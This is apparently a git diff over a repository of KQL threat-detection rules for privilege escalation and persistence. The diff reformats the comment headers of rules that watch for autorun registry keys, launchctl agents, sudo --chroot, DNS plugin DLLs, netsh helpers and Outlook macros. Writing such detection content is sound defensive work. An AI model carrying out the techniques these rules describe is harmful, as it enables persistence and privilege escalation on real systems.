@@ -1,13 +1,13 @@ -// Title: Internet Explorer Autorun Keys Modification -// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) -// Date: 2019-10-25 -// Level: medium -// Description: Detects modification of autostart extensibility point (ASEP) in registry. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 -// False Positives: -// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason -// - Legitimate administrator sets up autorun keys for legitimate reason - -DeviceRegistryEvents +// Title: Internet Explorer Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. 
+// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents | where (RegistryKey contains "\\Software\\Wow6432Node\\Microsoft\\Internet Explorer" or RegistryKey contains "\\Software\\Microsoft\\Internet Explorer") and (RegistryKey contains "\\Toolbar" or RegistryKey contains "\\Extensions" or RegistryKey contains "\\Explorer Bars") and (not((RegistryValueData =~ "(Empty)" or (RegistryKey contains "\\Extensions\\{2670000A-7350-4f3c-8081-5663EE0C6C49}" or RegistryKey contains "\\Extensions\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}" or RegistryKey contains "\\Extensions\\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}" or RegistryKey contains "\\Extensions\\{A95fe080-8f5d-11d2-a20b-00aa003c157a}") or (RegistryKey endswith "\\Toolbar\\ShellBrowser\\ITBar7Layout" or RegistryKey endswith "\\Toolbar\\ShowDiscussionButton" or RegistryKey endswith "\\Toolbar\\Locked")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/launch_agent_daemon_execution_via_launchctl.kql b/KQL/rules/Privilege Escalation/launch_agent_daemon_execution_via_launchctl.kql index 52bc1612..20fbc935 100644 --- a/KQL/rules/Privilege Escalation/launch_agent_daemon_execution_via_launchctl.kql +++ b/KQL/rules/Privilege Escalation/launch_agent_daemon_execution_via_launchctl.kql 
@@ -1,12 +1,12 @@ -// Title: Launch Agent/Daemon Execution Via Launchctl -// Author: Pratinav Chandra -// Date: 2024-05-13 -// Level: medium -// Description: Detects the execution of programs as Launch Agents or Launch Daemons using launchctl on macOS. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1569.001, attack.t1543.001, attack.t1543.004 -// False Positives: -// - Legitimate administration activities is expected to trigger false positives. Investigate the command line being passed to determine if the service or launch agent are suspicious. - -DeviceProcessEvents +// Title: Launch Agent/Daemon Execution Via Launchctl +// Author: Pratinav Chandra +// Date: 2024-05-13 +// Level: medium +// Description: Detects the execution of programs as Launch Agents or Launch Daemons using launchctl on macOS. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1569.001, attack.t1543.001, attack.t1543.004 +// False Positives: +// - Legitimate administration activities is expected to trigger false positives. Investigate the command line being passed to determine if the service or launch agent are suspicious. + +DeviceProcessEvents | where (ProcessCommandLine contains "submit" or ProcessCommandLine contains "load" or ProcessCommandLine contains "start") and FolderPath endswith "/launchctl" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/linux_sudo_chroot_execution.kql b/KQL/rules/Privilege Escalation/linux_sudo_chroot_execution.kql index db20864f..b199634d 100644 --- a/KQL/rules/Privilege Escalation/linux_sudo_chroot_execution.kql +++ b/KQL/rules/Privilege Escalation/linux_sudo_chroot_execution.kql 
@@ -1,15 +1,15 @@ -// Title: Linux Sudo Chroot Execution -// Author: Swachchhanda Shrawn Poudel (Nextron Systems) -// Date: 2025-10-02 -// Level: low -// Description: Detects the execution of 'sudo' command with '--chroot' option, which is used to change the root directory for command execution. -// Attackers may use this technique to evade detection and execute commands in a modified environment. -// This can be part of a privilege escalation strategy, as it allows the execution of commands with elevated privileges in a controlled environment as seen in CVE-2025-32463. -// While investigating, look out for unusual or unexpected use of 'sudo --chroot' in conjunction with other commands or scripts such as execution from temporary directories or unusual user accounts. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.t1068 -// False Positives: -// - Legitimate administrative tasks or scripts that use 'sudo --chroot' for containerization, testing, or system management. - -DeviceProcessEvents +// Title: Linux Sudo Chroot Execution +// Author: Swachchhanda Shrawn Poudel (Nextron Systems) +// Date: 2025-10-02 +// Level: low +// Description: Detects the execution of 'sudo' command with '--chroot' option, which is used to change the root directory for command execution. +// Attackers may use this technique to evade detection and execute commands in a modified environment. +// This can be part of a privilege escalation strategy, as it allows the execution of commands with elevated privileges in a controlled environment as seen in CVE-2025-32463. +// While investigating, look out for unusual or unexpected use of 'sudo --chroot' in conjunction with other commands or scripts such as execution from temporary directories or unusual user accounts. 
+// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.t1068 +// False Positives: +// - Legitimate administrative tasks or scripts that use 'sudo --chroot' for containerization, testing, or system management. + +DeviceProcessEvents | where (ProcessCommandLine contains " --chroot " or ProcessCommandLine contains "sudo -R ") and FolderPath endswith "/sudo" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/microsoft_sync_center_suspicious_network_connections.kql b/KQL/rules/Privilege Escalation/microsoft_sync_center_suspicious_network_connections.kql index f5b3a770..79d3d137 100644 --- a/KQL/rules/Privilege Escalation/microsoft_sync_center_suspicious_network_connections.kql +++ b/KQL/rules/Privilege Escalation/microsoft_sync_center_suspicious_network_connections.kql 
@@ -1,10 +1,10 @@ -// Title: Microsoft Sync Center Suspicious Network Connections -// Author: elhoim -// Date: 2022-04-28 -// Level: medium -// Description: Detects suspicious connections from Microsoft Sync Center to non-private IPs. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.t1055, attack.t1218, attack.execution, attack.defense-evasion - -DeviceNetworkEvents +// Title: Microsoft Sync Center Suspicious Network Connections +// Author: elhoim +// Date: 2022-04-28 +// Level: medium +// Description: Detects suspicious connections from Microsoft Sync Center to non-private IPs. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.t1055, attack.t1218, attack.execution, attack.defense-evasion + +DeviceNetworkEvents | where InitiatingProcessFolderPath endswith "\\mobsync.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/narrator_s_feedback_hub_persistence.kql b/KQL/rules/Privilege Escalation/narrator_s_feedback_hub_persistence.kql index d521f26a..1b8071db 100644 --- a/KQL/rules/Privilege Escalation/narrator_s_feedback_hub_persistence.kql +++ b/KQL/rules/Privilege Escalation/narrator_s_feedback_hub_persistence.kql 
@@ -1,10 +1,10 @@ -// Title: Narrator's Feedback-Hub Persistence -// Author: Dmitriy Lifanov, oscd.community -// Date: 2019-10-25 -// Level: high -// Description: Detects abusing Windows 10 Narrator's Feedback-Hub -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 - -DeviceRegistryEvents +// Title: Narrator's Feedback-Hub Persistence +// Author: Dmitriy Lifanov, oscd.community +// Date: 2019-10-25 +// Level: high +// Description: Detects abusing Windows 10 Narrator's Feedback-Hub +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 + +DeviceRegistryEvents | where (ActionType =~ "DeleteValue" and RegistryKey endswith "\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\Shell\\open\\command\\DelegateExecute") or RegistryKey endswith "\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\Shell\\open\\command\\(Default)" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/network_connection_initiated_via_notepad_exe.kql b/KQL/rules/Privilege Escalation/network_connection_initiated_via_notepad_exe.kql index c926c9a4..60cad49f 100644 --- a/KQL/rules/Privilege Escalation/network_connection_initiated_via_notepad_exe.kql +++ b/KQL/rules/Privilege Escalation/network_connection_initiated_via_notepad_exe.kql 
@@ -1,14 +1,14 @@ -// Title: Network Connection Initiated Via Notepad.EXE -// Author: EagleEye Team -// Date: 2020-05-14 -// Level: high -// Description: Detects a network connection that is initiated by the "notepad.exe" process. -// This might be a sign of process injection from a beacon process or something similar. -// Notepad rarely initiates a network communication except when printing documents for example. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.command-and-control, attack.execution, attack.defense-evasion, attack.t1055 -// False Positives: -// - Printing documents via notepad might cause communication with the printer via port 9100 or similar. - -DeviceNetworkEvents +// Title: Network Connection Initiated Via Notepad.EXE +// Author: EagleEye Team +// Date: 2020-05-14 +// Level: high +// Description: Detects a network connection that is initiated by the "notepad.exe" process. +// This might be a sign of process injection from a beacon process or something similar. +// Notepad rarely initiates a network communication except when printing documents for example. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.command-and-control, attack.execution, attack.defense-evasion, attack.t1055 +// False Positives: +// - Printing documents via notepad might cause communication with the printer via port 9100 or similar. + +DeviceNetworkEvents | where InitiatingProcessFolderPath endswith "\\notepad.exe" and (not(RemotePort == 9100)) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/new_activescripteventconsumer_created_via_wmic_exe.kql b/KQL/rules/Privilege Escalation/new_activescripteventconsumer_created_via_wmic_exe.kql index adca6786..91e403ac 100644 --- a/KQL/rules/Privilege Escalation/new_activescripteventconsumer_created_via_wmic_exe.kql +++ b/KQL/rules/Privilege Escalation/new_activescripteventconsumer_created_via_wmic_exe.kql 
@@ -1,12 +1,12 @@ -// Title: New ActiveScriptEventConsumer Created Via Wmic.EXE -// Author: Florian Roth (Nextron Systems) -// Date: 2021-06-25 -// Level: high -// Description: Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.003 -// False Positives: -// - Legitimate software creating script event consumers - -DeviceProcessEvents +// Title: New ActiveScriptEventConsumer Created Via Wmic.EXE +// Author: Florian Roth (Nextron Systems) +// Date: 2021-06-25 +// Level: high +// Description: Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.003 +// False Positives: +// - Legitimate software creating script event consumers + +DeviceProcessEvents | where ProcessCommandLine contains "ActiveScriptEventConsumer" and ProcessCommandLine contains " CREATE " \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/new_custom_shim_database_created.kql b/KQL/rules/Privilege Escalation/new_custom_shim_database_created.kql index ea14e885..b6c4d886 100644 --- a/KQL/rules/Privilege Escalation/new_custom_shim_database_created.kql +++ b/KQL/rules/Privilege Escalation/new_custom_shim_database_created.kql 
@@ -1,13 +1,13 @@ -// Title: New Custom Shim Database Created -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2021-12-29 -// Level: medium -// Description: Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. -// The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.009 -// False Positives: -// - Legitimate custom SHIM installations will also trigger this rule - -DeviceFileEvents +// Title: New Custom Shim Database Created +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-12-29 +// Level: medium +// Description: Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. +// The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.009 +// False Positives: +// - Legitimate custom SHIM installations will also trigger this rule + +DeviceFileEvents | where FolderPath contains ":\\Windows\\apppatch\\Custom\\" or FolderPath contains ":\\Windows\\apppatch\\CustomSDB\\" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/new_dns_serverlevelplugindll_installed.kql b/KQL/rules/Privilege Escalation/new_dns_serverlevelplugindll_installed.kql index 307db5e0..f3678c83 100644 --- a/KQL/rules/Privilege Escalation/new_dns_serverlevelplugindll_installed.kql +++ b/KQL/rules/Privilege Escalation/new_dns_serverlevelplugindll_installed.kql 
@@ -1,10 +1,10 @@ -// Title: New DNS ServerLevelPluginDll Installed -// Author: Florian Roth (Nextron Systems) -// Date: 2017-05-08 -// Level: high -// Description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required) -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.t1112 - -DeviceRegistryEvents +// Title: New DNS ServerLevelPluginDll Installed +// Author: Florian Roth (Nextron Systems) +// Date: 2017-05-08 +// Level: high +// Description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required) +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.t1112 + +DeviceRegistryEvents | where RegistryKey endswith "\\services\\DNS\\Parameters\\ServerLevelPluginDll" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/new_dns_serverlevelplugindll_installed_via_dnscmd_exe.kql b/KQL/rules/Privilege Escalation/new_dns_serverlevelplugindll_installed_via_dnscmd_exe.kql index bec45db7..b304067c 100644 --- a/KQL/rules/Privilege Escalation/new_dns_serverlevelplugindll_installed_via_dnscmd_exe.kql +++ b/KQL/rules/Privilege Escalation/new_dns_serverlevelplugindll_installed_via_dnscmd_exe.kql 
@@ -1,10 +1,10 @@ -// Title: New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE -// Author: Florian Roth (Nextron Systems) -// Date: 2017-05-08 -// Level: high -// Description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required) -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.t1112 - -DeviceProcessEvents +// Title: New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE +// Author: Florian Roth (Nextron Systems) +// Date: 2017-05-08 +// Level: high +// Description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required) +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.t1112 + +DeviceProcessEvents | where (ProcessCommandLine contains "/config" and ProcessCommandLine contains "/serverlevelplugindll") and FolderPath endswith "\\dnscmd.exe" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/new_netsh_helper_dll_registered_from_a_suspicious_location.kql b/KQL/rules/Privilege Escalation/new_netsh_helper_dll_registered_from_a_suspicious_location.kql index 337e8c14..e4204067 100644 --- a/KQL/rules/Privilege Escalation/new_netsh_helper_dll_registered_from_a_suspicious_location.kql +++ b/KQL/rules/Privilege Escalation/new_netsh_helper_dll_registered_from_a_suspicious_location.kql 
@@ -1,10 +1,10 @@ -// Title: New Netsh Helper DLL Registered From A Suspicious Location -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-11-28 -// Level: high -// Description: Detects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.007 - -DeviceRegistryEvents +// Title: New Netsh Helper DLL Registered From A Suspicious Location +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-11-28 +// Level: high +// Description: Detects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.007 + +DeviceRegistryEvents | where RegistryKey contains "\\SOFTWARE\\Microsoft\\NetSh" and ((RegistryValueData contains ":\\Perflogs\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\Temporary Internet") or ((RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favorites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favourites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Contacts\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Pictures\\"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/new_outlook_macro_created.kql b/KQL/rules/Privilege Escalation/new_outlook_macro_created.kql index 022ba935..7c153c5a 100644 
--- a/KQL/rules/Privilege Escalation/new_outlook_macro_created.kql +++ b/KQL/rules/Privilege Escalation/new_outlook_macro_created.kql @@ -1,12 +1,12 @@ -// Title: New Outlook Macro Created -// Author: @ScoubiMtl -// Date: 2021-04-05 -// Level: medium -// Description: Detects the creation of a macro file for Outlook. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.command-and-control, attack.t1137, attack.t1008, attack.t1546 -// False Positives: -// - User genuinely creates a VB Macro for their email - -DeviceFileEvents +// Title: New Outlook Macro Created +// Author: @ScoubiMtl +// Date: 2021-04-05 +// Level: medium +// Description: Detects the creation of a macro file for Outlook. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.command-and-control, attack.t1137, attack.t1008, attack.t1546 +// False Positives: +// - User genuinely creates a VB Macro for their email + +DeviceFileEvents | where InitiatingProcessFolderPath endswith "\\outlook.exe" and FolderPath endswith "\\Microsoft\\Outlook\\VbaProject.OTM" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/new_run_key_pointing_to_suspicious_folder.kql b/KQL/rules/Privilege Escalation/new_run_key_pointing_to_suspicious_folder.kql index 0dabaaa0..5e36cf0c 100644 --- a/KQL/rules/Privilege Escalation/new_run_key_pointing_to_suspicious_folder.kql +++ b/KQL/rules/Privilege Escalation/new_run_key_pointing_to_suspicious_folder.kql 
@@ -1,12 +1,12 @@ -// Title: New RUN Key Pointing to Suspicious Folder -// Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing, Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2018-08-25 -// Level: high -// Description: Detects suspicious new RUN key element pointing to an executable in a suspicious folder -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 -// False Positives: -// - Software using weird folders for updates - -DeviceRegistryEvents +// Title: New RUN Key Pointing to Suspicious Folder +// Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing, Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2018-08-25 +// Level: high +// Description: Detects suspicious new RUN key element pointing to an executable in a suspicious folder +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Software using weird folders for updates + +DeviceRegistryEvents | where (RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" or RegistryKey contains "\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run" or RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run") and ((RegistryValueData contains ":\\Perflogs" or RegistryValueData contains ":\\ProgramData'" or RegistryValueData contains ":\\Windows\\Temp" or RegistryValueData contains ":\\Temp" or RegistryValueData contains "\\AppData\\Local\\Temp" or RegistryValueData contains "\\AppData\\Roaming" or RegistryValueData contains ":\\$Recycle.bin" or RegistryValueData contains ":\\Users\\Default" or RegistryValueData contains ":\\Users\\public" or RegistryValueData contains "%temp%" or RegistryValueData contains "%tmp%" or RegistryValueData contains "%Public%" or RegistryValueData contains "%AppData%") or (RegistryValueData contains ":\\Users\\" and (RegistryValueData 
contains "\\Favorites" or RegistryValueData contains "\\Favourites" or RegistryValueData contains "\\Contacts" or RegistryValueData contains "\\Music" or RegistryValueData contains "\\Pictures" or RegistryValueData contains "\\Documents" or RegistryValueData contains "\\Photos"))) and (not(((RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "C:\\Windows\\Temp\\") and (RegistryValueData contains "rundll32.exe " and RegistryValueData contains "C:\\WINDOWS\\system32\\advpack.dll,DelNodeRunDLL32") and InitiatingProcessFolderPath startswith "C:\\Windows\\SoftwareDistribution\\Download\\" and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\RunOnce*"))) and (not((RegistryValueData endswith "Spotify.exe --autostart --minimized" and (InitiatingProcessFolderPath endswith "C:\\Program Files\\Spotify\\Spotify.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files (x86)\\Spotify\\Spotify.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Roaming\\Spotify\\Spotify.exe") and RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Spotify"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/office_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/office_autorun_keys_modification.kql index d15f18ab..fb1a6b4f 100644 --- a/KQL/rules/Privilege Escalation/office_autorun_keys_modification.kql +++ b/KQL/rules/Privilege Escalation/office_autorun_keys_modification.kql 
@@ -1,13 +1,13 @@ -// Title: Office Autorun Keys Modification -// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) -// Date: 2019-10-25 -// Level: medium -// Description: Detects modification of autostart extensibility point (ASEP) in registry. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 -// False Positives: -// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason -// - Legitimate administrator sets up autorun keys for legitimate reason - -DeviceRegistryEvents +// Title: Office Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents | where ((RegistryKey contains "\\Word\\Addins" or RegistryKey contains "\\PowerPoint\\Addins" or RegistryKey contains "\\Outlook\\Addins" or RegistryKey contains "\\Onenote\\Addins" or RegistryKey contains "\\Excel\\Addins" or RegistryKey contains "\\Access\\Addins" or RegistryKey contains "test\\Special\\Perf") and (RegistryKey contains "\\Software\\Wow6432Node\\Microsoft\\Office" or RegistryKey contains "\\Software\\Microsoft\\Office")) and (not((RegistryValueData =~ "(Empty)" or ((InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Office\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\" or 
InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\msiexec.exe" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\regsvr32.exe") and (RegistryKey endswith "\\Excel\\Addins\\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1*" or RegistryKey endswith "\\Excel\\Addins\\ExcelPlugInShell.PowerMapConnect*" or RegistryKey endswith "\\Excel\\Addins\\NativeShim*" or RegistryKey endswith "\\Excel\\Addins\\NativeShim.InquireConnector.1*" or RegistryKey endswith "\\Excel\\Addins\\PowerPivotExcelClientAddIn.NativeEntry.1*" or RegistryKey endswith "\\Outlook\\AddIns\\AccessAddin.DC*" or RegistryKey endswith "\\Outlook\\AddIns\\ColleagueImport.ColleagueImportAddin*" or RegistryKey endswith "\\Outlook\\AddIns\\EvernoteCC.EvernoteContactConnector*" or RegistryKey endswith "\\Outlook\\AddIns\\EvernoteOLRD.Connect*" or RegistryKey endswith "\\Outlook\\Addins\\Microsoft.VbaAddinForOutlook.1*" or RegistryKey endswith "\\Outlook\\Addins\\OcOffice.OcForms*" or RegistryKey contains "\\Outlook\\Addins\\OneNote.OutlookAddin" or RegistryKey endswith "\\Outlook\\Addins\\OscAddin.Connect*" or RegistryKey endswith "\\Outlook\\Addins\\OutlookChangeNotifier.Connect*" or RegistryKey contains "\\Outlook\\Addins\\UCAddin.LyncAddin.1" or RegistryKey contains "\\Outlook\\Addins\\UCAddin.UCAddin.1" or RegistryKey endswith "\\Outlook\\Addins\\UmOutlookAddin.FormRegionAddin*" or RegistryKey contains "AddinTakeNotesService\\FriendlyName")) or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\"))))) and (not((((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Avast Software\\Avast\\RegSvr.exe", "C:\\Program Files\\Avast Software\\Avast\\x86\\RegSvr.exe")) and RegistryKey endswith 
"\\Microsoft\\Office\\Outlook\\Addins\\Avast.AsOutExt*") or ((InitiatingProcessFolderPath in~ ("C:\\Program Files\\AVG\\Antivirus\\RegSvr.exe", "C:\\Program Files\\AVG\\Antivirus\\x86\\RegSvr.exe")) and RegistryKey endswith "\\Microsoft\\Office\\Outlook\\Addins\\Antivirus.AsOutExt*")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/outlook_macro_execution_without_warning_setting_enabled.kql b/KQL/rules/Privilege Escalation/outlook_macro_execution_without_warning_setting_enabled.kql index 2bdb2f95..67fee9f5 100644 --- a/KQL/rules/Privilege Escalation/outlook_macro_execution_without_warning_setting_enabled.kql +++ b/KQL/rules/Privilege Escalation/outlook_macro_execution_without_warning_setting_enabled.kql @@ -1,12 +1,12 @@ -// Title: Outlook Macro Execution Without Warning Setting Enabled -// Author: @ScoubiMtl -// Date: 2021-04-05 -// Level: high -// Description: Detects the modification of Outlook security setting to allow unprompted execution of macros. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.command-and-control, attack.t1137, attack.t1008, attack.t1546 -// False Positives: -// - Unlikely - -DeviceRegistryEvents +// Title: Outlook Macro Execution Without Warning Setting Enabled +// Author: @ScoubiMtl +// Date: 2021-04-05 +// Level: high +// Description: Detects the modification of Outlook security setting to allow unprompted execution of macros. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.command-and-control, attack.t1137, attack.t1008, attack.t1546 +// False Positives: +// - Unlikely + +DeviceRegistryEvents | where RegistryValueData contains "0x00000001" and RegistryKey endswith "\\Outlook\\Security\\Level" \ No newline at end of file 
diff --git a/KQL/rules/Privilege Escalation/password_set_to_never_expire_via_wmi.kql b/KQL/rules/Privilege Escalation/password_set_to_never_expire_via_wmi.kql index a40c936b..1c952b92 100644 --- a/KQL/rules/Privilege Escalation/password_set_to_never_expire_via_wmi.kql +++ b/KQL/rules/Privilege Escalation/password_set_to_never_expire_via_wmi.kql @@ -1,12 +1,12 @@ -// Title: Password Set to Never Expire via WMI -// Author: Daniel Koifman (KoifSec) -// Date: 2025-07-30 -// Level: medium -// Description: Detects the use of wmic.exe to modify user account settings and explicitly disable password expiration. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1047, attack.t1098 -// False Positives: -// - Legitimate administrative activity - -DeviceProcessEvents +// Title: Password Set to Never Expire via WMI +// Author: Daniel Koifman (KoifSec) +// Date: 2025-07-30 +// Level: medium +// Description: Detects the use of wmic.exe to modify user account settings and explicitly disable password expiration. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1047, attack.t1098 +// False Positives: +// - Legitimate administrative activity + +DeviceProcessEvents | where (ProcessCommandLine contains "useraccount" and ProcessCommandLine contains " set " and ProcessCommandLine contains "passwordexpires" and ProcessCommandLine contains "false") and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/persistence_via_cron_files.kql b/KQL/rules/Privilege Escalation/persistence_via_cron_files.kql index 5a6ded70..67bbd623 100644 --- a/KQL/rules/Privilege Escalation/persistence_via_cron_files.kql +++ b/KQL/rules/Privilege Escalation/persistence_via_cron_files.kql 
